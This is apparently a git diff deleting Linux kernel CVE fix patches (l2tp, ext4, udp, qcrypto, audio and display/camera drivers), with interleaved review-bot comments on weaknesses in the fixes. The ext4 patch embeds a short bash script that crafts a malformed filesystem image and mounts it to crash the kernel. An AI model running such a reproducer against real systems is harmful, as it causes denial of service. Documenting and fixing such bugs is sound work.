- [ 1116.897025] [< inline >] SYSC_socket net/socket.c:1223 - [ 1116.897025] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 - [ 1116.897025] [] entry_SYSCALL_64_fastpath+0x23/0xc6 -Freed: -PID = 10987 - [ 1116.897025] [] save_stack_trace+0x16/0x20 - [ 1116.897025] [] save_stack+0x46/0xd0 - [ 1116.897025] [] kasan_slab_free+0x71/0xb0 - [ 1116.897025] [< inline >] slab_free_hook mm/slub.c:1352 - [ 1116.897025] [< inline >] slab_free_freelist_hook mm/slub.c:1374 - [ 1116.897025] [< inline >] slab_free mm/slub.c:2951 - [ 1116.897025] [] kmem_cache_free+0xc8/0x330 mm/slub.c:2973 - [ 1116.897025] [< inline >] sk_prot_free net/core/sock.c:1369 - [ 1116.897025] [] __sk_destruct+0x32b/0x4f0 net/core/sock.c:1444 - [ 
1116.897025] [] sk_destruct+0x44/0x80 net/core/sock.c:1452 - [ 1116.897025] [] __sk_free+0x53/0x220 net/core/sock.c:1460 - [ 1116.897025] [] sk_free+0x23/0x30 net/core/sock.c:1471 - [ 1116.897025] [] sk_common_release+0x28c/0x3e0 ./include/net/sock.h:1589 - [ 1116.897025] [] l2tp_ip6_close+0x1fe/0x290 net/l2tp/l2tp_ip6.c:243 - [ 1116.897025] [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 - [ 1116.897025] [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 - [ 1116.897025] [] sock_release+0x8d/0x1d0 net/socket.c:570 - [ 1116.897025] [] sock_close+0x16/0x20 net/socket.c:1017 - [ 1116.897025] [] __fput+0x28c/0x780 fs/file_table.c:208 - [ 1116.897025] [] ____fput+0x15/0x20 fs/file_table.c:244 - [ 1116.897025] [] task_work_run+0xf9/0x170 - [ 1116.897025] [] do_exit+0x85e/0x2a00 - [ 1116.897025] [] do_group_exit+0x108/0x330 - [ 1116.897025] [] get_signal+0x617/0x17a0 kernel/signal.c:2307 - [ 1116.897025] [] do_signal+0x7f/0x18f0 - [ 1116.897025] [] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156 - [ 1116.897025] [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 - [ 1116.897025] [] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259 - [ 1116.897025] [] entry_SYSCALL_64_fastpath+0xc4/0xc6 -Memory state around the buggy address: - ffff8800081b0d80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc - ffff8800081b0e00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ->ffff8800081b0e80: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb - ^ - ffff8800081b0f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb - ffff8800081b0f80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb - -================================================================== - -The same issue exists with l2tp_ip_bind() and l2tp_ip_bind_table. - -Fixes: c51ce49735c1 ("l2tp: fix oops in L2TP IP sockets for connect() AF_UNSPEC case") -Reported-by: Baozeng Ding -Reported-by: Andrey Konovalov -Tested-by: Baozeng Ding -Signed-off-by: Guillaume Nault -Signed-off-by: David S. 
Miller ---- - net/l2tp/l2tp_ip.c | 5 +++-- - net/l2tp/l2tp_ip6.c | 5 +++-- - 2 files changed, 6 insertions(+), 4 deletions(-) - -diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c -index fce25af..982f6c4 100644 ---- a/net/l2tp/l2tp_ip.c -+++ b/net/l2tp/l2tp_ip.c -@@ -251,8 +251,6 @@ static int l2tp_ip_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len) - int ret; - int chk_addr_ret; - -- if (!sock_flag(sk, SOCK_ZAPPED)) -- return -EINVAL; - if (addr_len < sizeof(struct sockaddr_l2tpip)) - return -EINVAL; - if (addr->l2tp_family != AF_INET) -@@ -267,6 +265,9 @@ static int l2tp_ip_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len) - read_unlock_bh(&l2tp_ip_lock); - - lock_sock(sk); -+ if (!sock_flag(sk, SOCK_ZAPPED)) -+ goto out; -+ - if (sk->sk_state != TCP_CLOSE || addr_len < sizeof(struct sockaddr_l2tpip)) - goto out; - -diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c -index ad3468c..9978d01 100644 ---- a/net/l2tp/l2tp_ip6.c -+++ b/net/l2tp/l2tp_ip6.c -@@ -269,8 +269,6 @@ static int l2tp_ip6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len) - int addr_type; - int err; - -- if (!sock_flag(sk, SOCK_ZAPPED)) -- return -EINVAL; - if (addr->l2tp_family != AF_INET6) - return -EINVAL; - if (addr_len < sizeof(*addr)) -@@ -296,6 +294,9 @@ static int l2tp_ip6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len) - lock_sock(sk); - - err = -EINVAL; -+ if (!sock_flag(sk, SOCK_ZAPPED)) -+ goto out_unlock; -+ - if (sk->sk_state != TCP_CLOSE) - goto out_unlock; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10208/3.10-^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2016-10208/3.10-^3.16/0001.patch deleted file mode 100644 index a8320eed..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10208/3.10-^3.16/0001.patch +++ /dev/null 
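Review bot: In the embedded net/l2tp/l2tp_ip.c patch, the relocated `if (!sock_flag(sk, SOCK_ZAPPED)) goto out;` relies on whatever `ret` holds at that point, and the hunk shows no assignment to it. The removed check returned -EINVAL, and the l2tp_ip6.c hunk visibly sets `err = -EINVAL;` just before its relocated check. If `ret` carries a different code from the earlier bind-table lookup (that code is outside the hunk, so this is an assumption to confirm), user space would see a changed errno for an already-bound socket. Adding `ret = -EINVAL;` directly after `lock_sock(sk);` would make the two functions agree. Both function bodies continue outside the hunks shown.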
@@ -1,71 +0,0 @@ -From cde863587b6809fdf61ea3c5391ecf06884b5516 Mon Sep 17 00:00:00 2001 -From: Eryu Guan -Date: Thu, 1 Dec 2016 15:08:37 -0500 -Subject: ext4: validate s_first_meta_bg at mount time - -commit 3a4b77cd47bb837b8557595ec7425f281f2ca1fe upstream. - -Ralf Spenneberg reported that he hit a kernel crash when mounting a -modified ext4 image. And it turns out that kernel crashed when -calculating fs overhead (ext4_calculate_overhead()), this is because -the image has very large s_first_meta_bg (debug code shows it's -842150400), and ext4 overruns the memory in count_overhead() when -setting bitmap buffer, which is PAGE_SIZE. - -ext4_calculate_overhead(): - buf = get_zeroed_page(GFP_NOFS); <=== PAGE_SIZE buffer - blks = count_overhead(sb, i, buf); - -count_overhead(): - for (j = ext4_bg_num_gdb(sb, grp); j > 0; j--) { <=== j = 842150400 - ext4_set_bit(EXT4_B2C(sbi, s++), buf); <=== buffer overrun - count++; - } - -This can be reproduced easily for me by this script: - - #!/bin/bash - rm -f fs.img - mkdir -p /mnt/ext4 - fallocate -l 16M fs.img - mke2fs -t ext4 -O bigalloc,meta_bg,^resize_inode -F fs.img - debugfs -w -R "ssv first_meta_bg 842150400" fs.img - mount -o loop fs.img /mnt/ext4 - -Fix it by validating s_first_meta_bg first at mount time, and -refusing to mount if its value exceeds the largest possible meta_bg -number. 
- -Reported-by: Ralf Spenneberg -Signed-off-by: Eryu Guan -Signed-off-by: Theodore Ts'o -Reviewed-by: Andreas Dilger -[bwh: Backported to 3.16: use EXT4_HAS_INCOMPAT_FEATURE()] -Signed-off-by: Ben Hutchings ---- - fs/ext4/super.c | 9 +++++++++ - 1 file changed, 9 insertions(+) - -diff --git a/fs/ext4/super.c b/fs/ext4/super.c -index a1fed66..13a33c3 100644 ---- a/fs/ext4/super.c -+++ b/fs/ext4/super.c -@@ -3905,6 +3905,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent) - (EXT4_MAX_BLOCK_FILE_PHYS / EXT4_BLOCKS_PER_GROUP(sb))); - db_count = (sbi->s_groups_count + EXT4_DESC_PER_BLOCK(sb) - 1) / - EXT4_DESC_PER_BLOCK(sb); -+ if (EXT4_HAS_INCOMPAT_FEATURE(sb,EXT4_FEATURE_INCOMPAT_META_BG)) { -+ if (le32_to_cpu(es->s_first_meta_bg) >= db_count) { -+ ext4_msg(sb, KERN_WARNING, -+ "first meta block group too large: %u " -+ "(group descriptor block count %u)", -+ le32_to_cpu(es->s_first_meta_bg), db_count); -+ goto failed_mount; -+ } -+ } - sbi->s_group_desc = ext4_kvmalloc(db_count * - sizeof(struct buffer_head *), - GFP_KERNEL); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10229/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10229/ANY/0001.patch deleted file mode 100644 index 1d12eaa4..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10229/ANY/0001.patch +++ /dev/null 
@@ -1,94 +0,0 @@ -From 197c949e7798fbf28cfadc69d9ca0c2abbf93191 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Wed, 30 Dec 2015 08:51:12 -0500 -Subject: udp: properly support MSG_PEEK with truncated buffers - -Backport of this upstream commit into stable kernels : -89c22d8c3b27 ("net: Fix skb csum races when peeking") -exposed a bug in udp stack vs MSG_PEEK support, when user provides -a buffer smaller than skb payload. - -In this case, -skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr), - msg->msg_iov); -returns -EFAULT. - -This bug does not happen in upstream kernels since Al Viro did a great -job to replace this into : -skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg); -This variant is safe vs short buffers. - -For the time being, instead reverting Herbert Xu patch and add back -skb->ip_summed invalid changes, simply store the result of -udp_lib_checksum_complete() so that we avoid computing the checksum a -second time, and avoid the problematic -skb_copy_and_csum_datagram_iovec() call. - -This patch can be applied on recent kernels as it avoids a double -checksumming, then backported to stable kernels as a bug fix. - -Signed-off-by: Eric Dumazet -Acked-by: Herbert Xu -Signed-off-by: David S. 
Miller ---- - net/ipv4/udp.c | 6 ++++-- - net/ipv6/udp.c | 6 ++++-- - 2 files changed, 8 insertions(+), 4 deletions(-) - -diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c -index 8841e98..ac14ae4 100644 ---- a/net/ipv4/udp.c -+++ b/net/ipv4/udp.c -@@ -1271,6 +1271,7 @@ int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - bool slow; - - if (flags & MSG_ERRQUEUE) -@@ -1296,11 +1297,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_msg(skb, sizeof(struct udphdr), - msg, copied); - else { -diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c -index 9da3287..00775ee 100644 ---- a/net/ipv6/udp.c -+++ b/net/ipv6/udp.c -@@ -402,6 +402,7 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, - int peeked, off = 0; - int err; - int is_udplite = IS_UDPLITE(sk); -+ bool checksum_valid = false; - int is_udp4; - bool slow; - -@@ -433,11 +434,12 @@ try_again: - */ - - if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) { -- if (udp_lib_checksum_complete(skb)) -+ checksum_valid = !udp_lib_checksum_complete(skb); -+ if (!checksum_valid) - goto csum_copy_err; - } - -- if (skb_csum_unnecessary(skb)) -+ if (checksum_valid || skb_csum_unnecessary(skb)) - err = skb_copy_datagram_msg(skb, sizeof(struct udphdr), - msg, copied); - else { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10230/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10230/ANY/0001.patch deleted file mode 100644 index 91af1025..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10230/ANY/0001.patch +++ /dev/null 
@@ -1,35 +0,0 @@ -From bd9a8fc6d7f6bd1a0b936994630006de450df657 Mon Sep 17 00:00:00 2001 -From: Neeraj Soni -Date: Mon, 28 Nov 2016 18:23:33 +0530 -Subject: qcrypto: protect potential integer overflow. - -Adding user passed parameters without check might -lead to Integer overflow and unpredictable system -behaviour. - -Change-Id: Iaf8259e3c4a157e1790f1447b1b62a646988b7c4 -Signed-off-by: Neeraj Soni ---- - drivers/crypto/msm/qce50.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/drivers/crypto/msm/qce50.c b/drivers/crypto/msm/qce50.c -index b33d879..9788e0e 100644 ---- a/drivers/crypto/msm/qce50.c -+++ b/drivers/crypto/msm/qce50.c -@@ -4913,6 +4913,12 @@ int qce_aead_req(void *handle, struct qce_req *q_req) - else - q_req->cryptlen = areq->cryptlen - authsize; - -+ if ((q_req->cryptlen > UINT_MAX - areq->assoclen) || -+ (q_req->cryptlen + areq->assoclen > UINT_MAX - ivsize)) { -+ pr_err("Integer overflow on total aead req length.\n"); -+ return -EINVAL; -+ } -+ - totallen = q_req->cryptlen + areq->assoclen + ivsize; - - if (pce_dev->support_cmd_dscr) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10231/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10231/ANY/0001.patch deleted file mode 100644 index bd6cb256..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10231/ANY/0001.patch +++ /dev/null 
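Review bot: In the embedded drivers/crypto/msm/qce50.c patch, the new guard covers only the two additions, while the context line directly above it, `q_req->cryptlen = areq->cryptlen - authsize;`, can itself wrap when `areq->cryptlen` is smaller than `authsize`. This assumes the fields are unsigned, as the `UINT_MAX` comparisons suggest. A wrapped `cryptlen` is rejected only if the later sums also overflow, so it can still reach `totallen` as a very large length. A check such as `if (areq->cryptlen < authsize) return -EINVAL;` before the subtraction would close that path. If `totallen` is declared as a signed int (its declaration is outside the hunk), the bound should be `INT_MAX` rather than `UINT_MAX`.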
@@ -1,37 +0,0 @@ -From 3bfe5a89916f7d29492e9f6d941d108b688cb804 Mon Sep 17 00:00:00 2001 -From: Karthikeyan Mani -Date: Wed, 14 Dec 2016 11:46:35 -0800 -Subject: ASoC: wcd9335: Fix out of bounds for mad input value - -Add check in tasha_mad_input_put function to -return error on out of bounds access using -mad input value. - -CRs-fixed: 1096799 -Change-Id: Iddaa3fef362f7cb1919aa3bd8dd4b83133fe7c97 -Signed-off-by: Karthikeyan Mani ---- - sound/soc/codecs/wcd9335.c | 7 +++++++ - 1 file changed, 7 insertions(+) - -diff --git a/sound/soc/codecs/wcd9335.c b/sound/soc/codecs/wcd9335.c -index c94623c..1f97326 100644 ---- a/sound/soc/codecs/wcd9335.c -+++ b/sound/soc/codecs/wcd9335.c -@@ -7575,6 +7575,13 @@ static int tasha_mad_input_put(struct snd_kcontrol *kcontrol, - - tasha_mad_input = ucontrol->value.integer.value[0]; - -+ if (tasha_mad_input >= ARRAY_SIZE(tasha_conn_mad_text)) { -+ dev_err(codec->dev, -+ "%s: tasha_mad_input = %d out of bounds\n", -+ __func__, tasha_mad_input); -+ return -EINVAL; -+ } -+ - if (!strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED1") || - !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED2") || - !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED3") || --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10232/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-10232/3.10/0001.patch deleted file mode 100644 index f01b45cf..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10232/3.10/0001.patch +++ /dev/null 
@@ -1,83 +0,0 @@ -From 21e0ead58e47798567d846b84f16f89cf69a57ae Mon Sep 17 00:00:00 2001 -From: Shalini Krishnamoorthi -Date: Thu, 30 Jun 2016 14:00:04 -0700 -Subject: msm: mdss: Correct the format specifiers in sscanf function - -In many parts of the code the sscanf function was getting -an unsigned integer with a wrong format specifier. Changed -the format specifiers appropriately. Single variable sscanf -were replaced by kstrtouint at reported places. - -CRs-Fixed: 1024872 -Change-Id: I03ce718b0456d437d31d701586965d0aa7443b51 -Signed-off-by: Shalini Krishnamoorthi ---- - drivers/video/msm/mdss/mdss_debug.c | 6 +++--- - drivers/video/msm/mdss/mdss_fb.c | 10 +++++----- - 2 files changed, 8 insertions(+), 8 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index 1d214ca..525cdbd 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -78,7 +78,7 @@ static ssize_t panel_debug_base_offset_write(struct file *file, - - buf[count] = 0; /* end of string */ - -- if (sscanf(buf, "%x %x", &off, &cnt) != 2) -+ if (sscanf(buf, "%x %u", &off, &cnt) != 2) - return -EFAULT; - - if (off > dbg->max_offset) -@@ -679,11 +679,11 @@ static ssize_t mdss_debug_factor_write(struct file *file, - - if (strnchr(buf, count, '/')) { - /* Parsing buf as fraction */ -- if (sscanf(buf, "%d/%d", &numer, &denom) != 2) -+ if (sscanf(buf, "%u/%u", &numer, &denom) != 2) - return -EFAULT; - } else { - /* Parsing buf as percentage */ -- if (sscanf(buf, "%d", &numer) != 1) -+ if (kstrtouint(buf, 0, &numer)) - return -EFAULT; - denom = 100; - } -diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c -index 971fde4..ecc35c9 100644 ---- a/drivers/video/msm/mdss/mdss_fb.c -+++ b/drivers/video/msm/mdss/mdss_fb.c -@@ -2,7 +2,7 @@ - * Core MDSS framebuffer driver. - * - * Copyright (C) 2007 Google Incorporated -- * Copyright (c) 2008-2015, The Linux Foundation. All rights reserved. 
-+ * Copyright (c) 2008-2016, The Linux Foundation. All rights reserved. - * - * This software is licensed under the terms of the GNU General Public - * License version 2, as published by the Free Software Foundation, and -@@ -593,8 +593,8 @@ static ssize_t mdss_fb_force_panel_dead(struct device *dev, - return len; - } - -- if (sscanf(buf, "%d", &pdata->panel_info.panel_force_dead) != 1) -- pr_err("sccanf buf error!\n"); -+ if (kstrtouint(buf, 0, &pdata->panel_info.panel_force_dead)) -+ pr_err("kstrtouint buf error\n"); - - return len; - } -@@ -707,8 +707,8 @@ static ssize_t mdss_fb_change_dfps_mode(struct device *dev, - } - pinfo = &pdata->panel_info; - -- if (sscanf(buf, "%d", &dfps_mode) != 1) { -- pr_err("sccanf buf error!\n"); -+ if (kstrtouint(buf, 0, &dfps_mode)) { -+ pr_err("kstrtouint buf error\n"); - return len; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10232/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-10232/3.18/0002.patch deleted file mode 100644 index 6f3a9bf1..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10232/3.18/0002.patch +++ /dev/null 
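Review bot: In the embedded mdss_debug.c and mdss_fb.c patches, the new `kstrtouint()` calls either map any failure to `-EFAULT` (mdss_debug_factor_write) or only log it and return `len` as if the write had succeeded (mdss_fb_force_panel_dead, mdss_fb_change_dfps_mode). Propagating the parser's own result, for example `rc = kstrtouint(buf, 0, &numer); if (rc) return rc;`, lets callers tell malformed input (-EINVAL) from out-of-range input (-ERANGE). Base 0 also changes what is accepted compared with `%d`: a leading `0` or `0x` is now read as octal or hex, and trailing text other than a newline is rejected. In the fraction branch, `"%u/%u"` still accepts a zero `denom`; whether that is checked before use is outside the hunk. The 3.18 variant of this patch that follows has the same pattern.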
@@ -1,111 +0,0 @@ -From 27f7b3b3059f6181e2786f886f4cd92f413bc30c Mon Sep 17 00:00:00 2001 -From: Shalini Krishnamoorthi -Date: Thu, 30 Jun 2016 14:00:04 -0700 -Subject: msm: mdss: Correct the format specifiers in sscanf function - -In many parts of the code the sscanf function was getting -an unsigned integer with a wrong format specifier. Changed -the format specifiers appropriately. Single variable sscanf -were replaced by kstrtouint at reported places. - -CRs-Fixed: 1024872 -Change-Id: I03ce718b0456d437d31d701586965d0aa7443b51 -Signed-off-by: Shalini Krishnamoorthi ---- - drivers/video/msm/mdss/mdss_debug.c | 8 ++++---- - drivers/video/msm/mdss/mdss_fb.c | 8 ++++---- - drivers/video/msm/mdss/mdss_mdp.c | 2 +- - drivers/video/msm/mdss/mdss_mdp_overlay.c | 2 +- - 4 files changed, 10 insertions(+), 10 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index 21c2394..861d70f 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -81,7 +81,7 @@ static ssize_t panel_debug_base_offset_write(struct file *file, - - buf[count] = 0; /* end of string */ - -- if (sscanf(buf, "%x %d", &off, &cnt) != 2) -+ if (sscanf(buf, "%x %u", &off, &cnt) != 2) - return -EFAULT; - - if (off > dbg->max_offset) -@@ -735,11 +735,11 @@ static ssize_t mdss_debug_factor_write(struct file *file, - - if (strnchr(buf, count, '/')) { - /* Parsing buf as fraction */ -- if (sscanf(buf, "%d/%d", &numer, &denom) != 2) -+ if (sscanf(buf, "%u/%u", &numer, &denom) != 2) - return -EFAULT; - } else { - /* Parsing buf as percentage */ -- if (sscanf(buf, "%d", &numer) != 1) -+ if (kstrtouint(buf, 0, &numer)) - return -EFAULT; - denom = 100; - } -@@ -1047,7 +1047,7 @@ static ssize_t mdss_debug_perf_bw_limit_write(struct file *file, - - if (strnchr(buf, count, ' ')) { - /* Parsing buf */ -- if (sscanf(buf, "%d %d", &mode, &val) != 2) -+ if (sscanf(buf, "%u %u", &mode, &val) != 2) - return -EFAULT; - } - -diff --git 
a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c -index dc2e318..624b344 100644 ---- a/drivers/video/msm/mdss/mdss_fb.c -+++ b/drivers/video/msm/mdss/mdss_fb.c -@@ -600,8 +600,8 @@ static ssize_t mdss_fb_force_panel_dead(struct device *dev, - return len; - } - -- if (sscanf(buf, "%d", &pdata->panel_info.panel_force_dead) != 1) -- pr_err("sccanf buf error!\n"); -+ if (kstrtouint(buf, 0, &pdata->panel_info.panel_force_dead)) -+ pr_err("kstrtouint buf error!\n"); - - return len; - } -@@ -714,8 +714,8 @@ static ssize_t mdss_fb_change_dfps_mode(struct device *dev, - } - pinfo = &pdata->panel_info; - -- if (sscanf(buf, "%d", &dfps_mode) != 1) { -- pr_err("sccanf buf error!\n"); -+ if (kstrtouint(buf, 0, &dfps_mode)) { -+ pr_err("kstrtouint buf error!\n"); - return len; - } - -diff --git a/drivers/video/msm/mdss/mdss_mdp.c b/drivers/video/msm/mdss/mdss_mdp.c -index e2697ca..7bfbdda 100644 ---- a/drivers/video/msm/mdss/mdss_mdp.c -+++ b/drivers/video/msm/mdss/mdss_mdp.c -@@ -2448,7 +2448,7 @@ static ssize_t mdss_mdp_store_max_limit_bw(struct device *dev, - struct mdss_data_type *mdata = dev_get_drvdata(dev); - u32 data = 0; - -- if (1 != sscanf(buf, "%d", &data)) { -+ if (kstrtouint(buf, 0, &data)) { - pr_info("Not able scan to bw_mode_bitmap\n"); - } else { - mdata->bw_mode_bitmap = data; -diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c -index 7e2325f..74cb38e 100644 ---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c -+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c -@@ -2973,7 +2973,7 @@ static ssize_t dynamic_fps_sysfs_wta_dfps(struct device *dev, - - if (pdata->panel_info.dfps_update == - DFPS_IMMEDIATE_MULTI_UPDATE_MODE_CLK_HFP) { -- if (sscanf(buf, "%d %d %d %d %d", -+ if (sscanf(buf, "%u %u %u %u %u", - &data.hfp, &data.hbp, &data.hpw, - &data.clk_rate, &data.fps) != 5) { - pr_err("could not read input\n"); --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-10233/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10233/ANY/0001.patch
deleted file mode 100644
index 1e482a70..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10233/ANY/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@ -From d793c6d91ecba2a1fd206ad47a4fd408d290addf Mon Sep 17 00:00:00 2001 -From: Trilokesh Rangam -Date: Wed, 23 Nov 2016 09:41:36 +0530 -Subject: msm-camera: Addressing possible overflow conditions - -Changes to address possible integer overflow and incorrect -array indexing conditions. - -Change-Id: Ib134320cd6f7b34d7a10572ec347ec12127049a9 -Signed-off-by: Trilokesh Rangam ---- - drivers/media/video/msm/io/msm_camera_io_util.c | 6 +++++ - drivers/media/video/msm/msm_mctl_pp.c | 36 ++++++++++++++++++++++--- - 2 files changed, 38 insertions(+), 4 deletions(-) - -diff --git a/drivers/media/video/msm/io/msm_camera_io_util.c b/drivers/media/video/msm/io/msm_camera_io_util.c -index cede05d..1d2a70c 100644 ---- a/drivers/media/video/msm/io/msm_camera_io_util.c -+++ b/drivers/media/video/msm/io/msm_camera_io_util.c -@@ -181,6 +181,12 @@ int msm_camera_config_vreg(struct device *dev, struct camera_vreg_t *cam_vreg, - pr_err("%s:%d vreg sequence invalid\n", __func__, __LINE__); - return -EINVAL; - } -+ -+ if (cam_vreg == NULL) { -+ pr_err("%s:%d cam_vreg sequence invalid\n", __func__, __LINE__); -+ return -EINVAL; -+ } -+ - if (!num_vreg_seq) - num_vreg_seq = num_vreg; - -diff --git a/drivers/media/video/msm/msm_mctl_pp.c b/drivers/media/video/msm/msm_mctl_pp.c -index 8f4f004..61321bf 100644 ---- a/drivers/media/video/msm/msm_mctl_pp.c -+++ b/drivers/media/video/msm/msm_mctl_pp.c -@@ -36,6 +36,8 @@ - #define D(fmt, args...) 
do {} while (0) - #endif - -+#define UINT32_MAX (4294967295U) -+ - static int msm_mctl_pp_buf_divert( - struct msm_cam_media_controller *pmctl, - struct msm_cam_v4l2_dev_inst *pcam_inst, -@@ -668,11 +670,24 @@ int msm_mctl_pp_done( - dirty = 1; - } - } else { -- if (frame.num_planes > 1) -+ if (frame.num_planes > 1) { -+ if (frame.mp[0].phy_addr > -+ (UINT32_MAX - frame.mp[0].data_offset)) { -+ pr_err("%s:%d Invalid data offset\n", __func__, __LINE__); -+ return -EINVAL; -+ -+ } - buf.ch_paddr[0] = frame.mp[0].phy_addr + - frame.mp[0].data_offset; -- else -+ } else { -+ if (frame.sp.phy_addr > -+ (UINT32_MAX - frame.sp.y_off)) { -+ pr_err("%s:%d Invalid Y offset\n", __func__, __LINE__); -+ return -EINVAL; -+ -+ } - buf.ch_paddr[0] = frame.sp.phy_addr + frame.sp.y_off; -+ } - } - spin_unlock_irqrestore(&p_mctl->pp_info.lock, flags); - -@@ -713,11 +728,24 @@ int msm_mctl_pp_divert_done( - buf_handle.image_mode = frame.image_type; - } - -- if (frame.num_planes > 1) -+ if (frame.num_planes > 1) { -+ if (frame.mp[0].phy_addr > -+ (UINT32_MAX - frame.mp[0].data_offset)) { -+ pr_err("%s:%d Invalid data offset\n", __func__, __LINE__); -+ return -EINVAL; -+ -+ } - buf.ch_paddr[0] = frame.mp[0].phy_addr + - frame.mp[0].data_offset; -- else -+ } else { -+ if (frame.sp.phy_addr > -+ (UINT32_MAX - frame.sp.y_off)) { -+ pr_err("%s:%d Invalid Y offset\n", __func__, __LINE__); -+ return -EINVAL; -+ -+ } - buf.ch_paddr[0] = frame.sp.phy_addr + frame.sp.y_off; -+ } - - spin_unlock_irqrestore(&p_mctl->pp_info.lock, flags); - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10234/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-10234/3.10/0001.patch deleted file mode 100644 index 9b73a723..00000000 --- a/Patches/Linux_CVEs/CVE-2016-10234/3.10/0001.patch +++ /dev/null 
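Review bot: In the embedded msm_mctl_pp.c patch, each added `return -EINVAL;` in msm_mctl_pp_done() and msm_mctl_pp_divert_done() sits before the `spin_unlock_irqrestore(&p_mctl->pp_info.lock, flags);` that follows the if/else in the context lines. If the lock is taken earlier in these functions, as that unlock suggests (the acquisition is outside the hunks), every overflow rejection returns with the spinlock held and interrupts disabled. A bad offset would then cause a lockup rather than a clean error. Each error branch should call `spin_unlock_irqrestore(&p_mctl->pp_info.lock, flags);` before `return -EINVAL;`, or set an `rc` and jump to a common unlock label. The file-local `#define UINT32_MAX (4294967295U)` is also worth replacing with the kernel's existing limit macro where the target tree provides one.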
@@ -1,287 +0,0 @@
-From c7d7492c1e329fdeb28a7901c4cd634d41a996b1 Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Mon, 31 Oct 2016 17:18:15 -0700
-Subject: msm: ipa: fix ioctl input param validation
-
-Fix input parameter validation in order to avoid
-device crash because of incorrect parameter in IPA driver.
-
-Change-Id: Icbdb05aeb9211665420a872d3453dbbd24fd347b
-CRs-Fixed: 1069060
-Acked-by: Ady Abraham
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_flt.c | 36 +++++++++++++++---
- drivers/platform/msm/ipa/ipa_i.h | 2 +-
- drivers/platform/msm/ipa/ipa_nat.c | 77 +++++++++++++++++++++++++++++++++++++-
- drivers/platform/msm/ipa/ipa_rt.c | 26 +++++++++++--
- 4 files changed, 129 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_flt.c b/drivers/platform/msm/ipa/ipa_flt.c
